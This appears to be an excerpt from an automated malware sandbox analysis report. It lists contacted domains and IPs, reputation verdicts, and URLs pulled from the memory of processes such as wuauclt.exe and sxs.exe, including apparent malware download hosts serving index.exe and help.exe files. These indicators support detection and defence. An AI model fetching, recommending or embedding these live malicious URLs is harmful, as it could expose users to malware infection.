https://syndicatedsearch.goog/afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=2gf50ip8fgbm&aqid=1o_QZoOUFf6kjuwPko2JoA0&psid=7621175430&pbt=bv&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=11%7C0%7C1627%7C1343%7C1527&lle=0&ifv=1&hpt=00%Avira URL Cloudsafe
https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c210%Avira URL Cloudsafe
http://www.onefordvd.com/&0%Avira URL Cloudsafe
http://msg.tmhacker.com/ie.txt&0%Avira URL Cloudsafe
http://1861119.com/1.txtW0%Avira URL Cloudsafe
http://msg.tmhacker.com/ie.txt)0%Avira URL Cloudsafe
http://www.dvdforone.com/230%Avira URL Cloudsafe
https://syndicatedsearch.goog/afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=g3yhpaijmirq&aqid=1o_QZoOUFf6kjuwPko2JoA0&psid=7621175430&pbt=bs&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=11%7C0%7C1627%7C1343%7C1527&lle=0&ifv=1&hpt=00%Avira URL Cloudsafe
http://domainretailing.com/rg-dsale3p.php?d=onefordvd.com0%Avira URL Cloudsafe
http://www.dvdforone.com0%Avira URL Cloudsafe
http://1861119.com/index.exeE0%Avira URL Cloudsafe
http://1861119.com/1.txtO0%Avira URL Cloudsafe
http://msg.tmhacker.com/ie.txt-0%Avira URL Cloudsafe
http://1861119.com/ie.txt/0%Avira URL Cloudsafe
https://www.google.com/adsense/domains/caf.js?abp=1&gdabp=true0%Avira URL Cloudsafe
http://msg.tmhacker.com/ie.txt~n0%Avira URL Cloudsafe
http://1861119.com/index.exe0U0%Avira URL Cloudsafe
http://1861119.com/index.exe80%Avira URL Cloudsafe
https://img1.wsimg.com/parking-lander/static/css/main.ef90a627.css0%Avira URL Cloudsafe
http://w.tw7890.com/100%Avira URL Cloudmalware
http://msg.tmhacker.com/tean1.txtJS;.JSE;.WSF;.WSH;#F0%Avira URL Cloudsafe
http://www.dvdforone.com/o0%Avira URL Cloudsafe
http://msg.tmhacker.com/ie.txtp10%Avira URL Cloudsafe
http://1861119.com/index.exe.0%Avira URL Cloudsafe
http://www.onefordvd.com/~0%Avira URL Cloudsafe
http://www.dvdforone.com/4b823s0%Avira URL Cloudsafe
http://www.onefordvd.com/v0%Avira URL Cloudsafe
http://www.onefordvd.com/23M40%Avira URL Cloudsafe
http://www.onefordvd.com/6x0%Avira URL Cloudsafe
http://www.onefordvd.com/n0%Avira URL Cloudsafe
http://www.onefordvd.com_0%Avira URL Cloudsafe
http://www.tw7890.com/twv/help.exehttp://www.om7890.com/mfx/help.exehttp://www.hg7890.com/hgb/help.e100%Avira URL Cloudmalware
http://www.onefordvd.com/t0%Avira URL Cloudsafe
http://www.onefordvd.com/l0%Avira URL Cloudsafe
https://ad-delivery.net/px.gif?ch=1&e=0.75505733851200410%Avira URL Cloudsafe
http://www.onefordvd.come0%Avira URL Cloudsafe
http://www.onefordvd.com/100%Avira URL Cloudsafe
https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c210%Avira URL Cloudsafe
http://msg.tmhacker.com/down.txtrp0%Avira URL Cloudsafe
http://msg.tmhacker.com/tean1.txtME0%Avira URL Cloudsafe
http://www.onefordvd.com/i0%Avira URL Cloudsafe
http://msg.tmhacker.com/down.txtrj0%Avira URL Cloudsafe
http://msg.tmhacker.com/ie.txtSia0%Avira URL Cloudsafe
http://www.onefordvd.com/Y0%Avira URL Cloudsafe
https://btloader.com/tag?o=5097926782615552&upapi=true0%Avira URL Cloudsafe
http://www.onefordvd.com/W0%Avira URL Cloudsafe
http://www.dvdforone.com/Vh0%Avira URL Cloudsafe
http://1861119.com/1.txtnss0%Avira URL Cloudsafe
http://www.tw7890.com/twv/help.exe100%Avira URL Cloudmalware
http://www.onefordvd.com/lander0%Avira URL Cloudsafe
http://1861119.com/ie.txt~0%Avira URL Cloudsafe
http://1861119.com/ie.txtlate0%Avira URL Cloudsafe
http://www.onefordvd.com0%Avira URL Cloudsafe
http://www.onefordvd.com/4b8230%Avira URL Cloudsafe
http://msg.tmhacker.com/tean1.txt&0%Avira URL Cloudsafe
http://www.dvdforone.comC:0%Avira URL Cloudsafe
http://www.dvdforone.com/0%Avira URL Cloudsafe
http://www.onefordvd.com/c%10%Avira URL Cloudsafe
https://syndicatedsearch.goog/afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=11hs6q014uq&aqid=1Y_QZrGTL9KnjuwPiPe1wA0&psid=7621175430&pbt=bs&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=4%7C0%7C1541%7C1243%7C284&lle=0&ifv=1&hpt=00%Avira URL Cloudsafe
http://1861119.com/index.exe3N0%Avira URL Cloudsafe
http://msg.tmhacker.com/tean1.txt0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
gddomainparking.com
54.174.215.77
truefalse
    		unknown
    google.com
    		142.250.186.110
    		truefalse
      		unknown
      syndicatedsearch.goog
      		172.217.16.206
      		truefalse
        		unknown
        ad.doubleclick.net
        		216.58.206.38
        		truefalse
          		unknown
          www.google.com
          		142.250.186.68
          		truefalse
            		unknown
            btloader.com
            		172.67.41.60
            		truefalse
              		unknown
              googlehosted.l.googleusercontent.com
              		142.250.186.161
              		truefalse
                		unknown
                www.onefordvd.com
                		15.197.204.56
                		truefalse
                  		unknown
                  ad-delivery.net
                  		172.67.69.19
                  		truefalse
                    		unknown
                    img1.wsimg.com
                    		unknown
                    		unknownfalse
                      		unknown
                      1861119.com
                      		unknown
                      		unknownfalse
                        		unknown
                        afs.googleusercontent.com
                        		unknown
                        		unknownfalse
                          		unknown
                          www.dvdforone.com
                          		unknown
                          		unknownfalse
                            		unknown
                            api.aws.parking.godaddy.com
                            		unknown
                            		unknownfalse
                              		unknown
                              msg.tmhacker.com
                              		unknown
                              		unknownfalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://ad-delivery.net/px.gif?ch=2false
                                • URL Reputation: safe
                                		unknown
                                https://api.aws.parking.godaddy.com/v1/parkingEvents?abp=1&gdabp=truefalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://syndicatedsearch.goog/afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=lhb5r7xl5det&aqid=1Y_QZrGTL9KnjuwPiPe1wA0&psid=7621175430&pbt=bv&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=4%7C0%7C1541%7C1243%7C284&lle=0&ifv=1&hpt=0false
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.onefordvd.com/landerfalse
                                  		unknown
                                  https://ad-delivery.net/px.gif?ch=1&e=0.7379176731179411false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ad.doubleclick.net/favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.google.com/js/bg/qfimbA0GYhgyETKN2gHT05d-Hpg6wiB8plDJ1aMSf3s.jsfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://syndicatedsearch.goog/adsense/domains/caf.js?pac=0false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://syndicatedsearch.goog/afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=2gf50ip8fgbm&aqid=1o_QZoOUFf6kjuwPko2JoA0&psid=7621175430&pbt=bv&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=11%7C0%7C1627%7C1343%7C1527&lle=0&ifv=1&hpt=0false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://syndicatedsearch.goog/afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=g3yhpaijmirq&aqid=1o_QZoOUFf6kjuwPko2JoA0&psid=7621175430&pbt=bs&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=11%7C0%7C1627%7C1343%7C1527&lle=0&ifv=1&hpt=0false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.google.com/adsense/domains/caf.js?abp=1&gdabp=truefalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ad-delivery.net/px.gif?ch=1&e=0.7550573385120041false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://btloader.com/tag?o=5097926782615552&upapi=truefalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com/landerfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://syndicatedsearch.goog/afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=11hs6q014uq&aqid=1Y_QZrGTL9KnjuwPiPe1wA0&psid=7621175430&pbt=bs&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=4%7C0%7C1541%7C1243%7C284&lle=0&ifv=1&hpt=0false
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://msg.tmhacker.com/ie.txtZinwuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://syndicatedsearch.googchromecache_98.8.dr, chromecache_104.8.dr, chromecache_106.8.dr, chromecache_108.8.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://1861119.com/1.txtwuauclt.exe, 00000004.00000002.3253380639.000000000066E000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253732346.0000000002102000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2234954053.000000000055B000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234156390.00000000023B2000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/index.exe$Nwuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dvdforone.com/0Mexplorer.exe, 0000002E.00000003.2804701070.0000000000572000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002E.00000003.2804551864.0000000000565000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.xxx.com/qqmsg.txtwuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/ie.txthT;wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/ie.txtwuauclt.exe, 0000002A.00000002.2234954053.000000000055B000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.xxx.com/abc.exewuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/down.txtwuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.xxx.com/ie.txtwuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/ie.txt_sxs.exe, 00000000.00000002.2041399746.00000000007DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/index.exeq#sxs.exe, 00000000.00000002.2041399746.0000000000820000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://img1.wsimg.com/parking-lander/static/js/main.5bbf83b7.jschromecache_90.8.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/tean1.txt8Uwuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.google.com/pagead/1p-conversion/16521530460/?gad_source=1&adview_type=5chromecache_98.8.dr, chromecache_104.8.dr, chromecache_106.8.dr, chromecache_108.8.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/ie.txsxs.exe, 00000000.00000003.2035087789.0000000002172000.00000004.00001000.00020000.00000000.sdmp, sxs.exe, 00000000.00000003.2035087789.0000000002175000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253732346.0000000002102000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234156390.00000000023B2000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.comXVsxs.exe, 00000000.00000003.2035087789.0000000002175000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/ie.twuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://login.liwuauclt.exe, 0000002A.00000002.2235055048.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234500669.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dvdforone.com/C:explorer.exe, 0000002E.00000003.2804701070.0000000000572000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002E.00000002.2804925525.0000000000573000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002E.00000003.2804551864.0000000000565000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/index.exewuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253732346.0000000002102000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2198638536.00000000005C1000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234156390.00000000023B2000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.om7890.com/mfx/help.exesxs.exe, sxs.exe, 00000000.00000003.2016766274.0000000000740000.00000040.00001000.00020000.00000000.sdmp, sxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000002.00000002.3252602889.0000000000100000.00000040.00000400.00020000.00000000.sdmp, wuauclt.exe, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2180435124.0000000002310000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 0000002B.00000002.3252569275.0000000000D50000.00000040.00000400.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.onefordvd.com/Aexplorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2638890708.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dvdforone.com/Zyexplorer.exe, 0000002E.00000002.2804925525.0000000000544000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com/s.lllexplorer.exe, 0000000C.00000003.2676269391.000000000148B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.000000000148C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.comopsxs.exe, 00000000.00000002.2041399746.000000000084B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/ie.txtwuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2234954053.000000000055B000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/index.exeb1wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.gamesrb.com/rbm/help.exesxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com/)explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2638890708.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com/&explorer.exe, 0000000C.00000003.2676356523.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.00000000014AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/ie.txt&wuauclt.exe, 00000004.00000003.2081368568.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/1.txtWsxs.exe, 00000000.00000002.2041399746.00000000007DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dvdforone.com/23explorer.exe, 0000002E.00000002.2804925525.0000000000544000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/ie.txt)wuauclt.exe, 00000004.00000003.2081368568.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dvdforone.comwuauclt.exe, 0000002A.00000002.2234954053.000000000055B000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://domainretailing.com/rg-dsale3p.php?d=onefordvd.comchromecache_112.8.dr, chromecache_103.8.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/index.exeEwuauclt.exe, 00000004.00000002.3253380639.00000000006B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/ie.txt-wuauclt.exe, 00000004.00000003.2081368568.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/1.txtOsxs.exe, 00000000.00000002.2041399746.00000000007DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/ie.txt/wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://img1.wsimg.com/parking-lander/static/css/main.ef90a627.csschromecache_90.8.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/ie.txt~nwuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/index.exe0Uwuauclt.exe, 00000004.00000002.3253732346.0000000002105000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://w.tw7890.com/sxs.exe, 00000000.00000003.2016117630.0000000000740000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177702991.00000000021E0000.00000040.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://1861119.com/index.exe8wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/tean1.txtJS;.JSE;.WSF;.WSH;#Fwuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/ie.txtp1wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dvdforone.com/oexplorer.exe, 0000002D.00000002.2208846931.0000000000E83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/index.exe.sxs.exe, 00000000.00000002.2041399746.0000000000820000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com/~explorer.exe, 0000000C.00000003.2676356523.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.00000000014AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com/23M4explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F60000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com/6xexplorer.exe, 0000000C.00000002.2676562250.0000000001463000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com/vexplorer.exe, 00000009.00000002.2101961189.00000000029A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dvdforone.com/4b823sexplorer.exe, 0000002E.00000002.2804925525.0000000000544000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com/texplorer.exe, 0000000C.00000003.2676356523.00000000014AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com_sxs.exe, 00000000.00000002.2041399746.0000000000868000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com/nexplorer.exe, 0000000C.00000003.2676356523.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.00000000014AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.tw7890.com/twv/help.exehttp://www.om7890.com/mfx/help.exehttp://www.hg7890.com/hgb/help.esxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.onefordvd.com/lexplorer.exe, 0000000C.00000003.2676269391.000000000148B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.000000000148C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.comeexplorer.exe, 00000003.00000002.2043412825.0000000002900000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com/iexplorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2638890708.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/tean1.txtMEwuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com/10explorer.exe, 00000009.00000002.2101961189.00000000029A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/down.txtrpwuauclt.exe, 00000004.00000002.3253380639.00000000006B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/down.txtrjwuauclt.exe, 00000004.00000002.3253380639.00000000006B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/ie.txtSiawuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com/Yexplorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2638890708.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
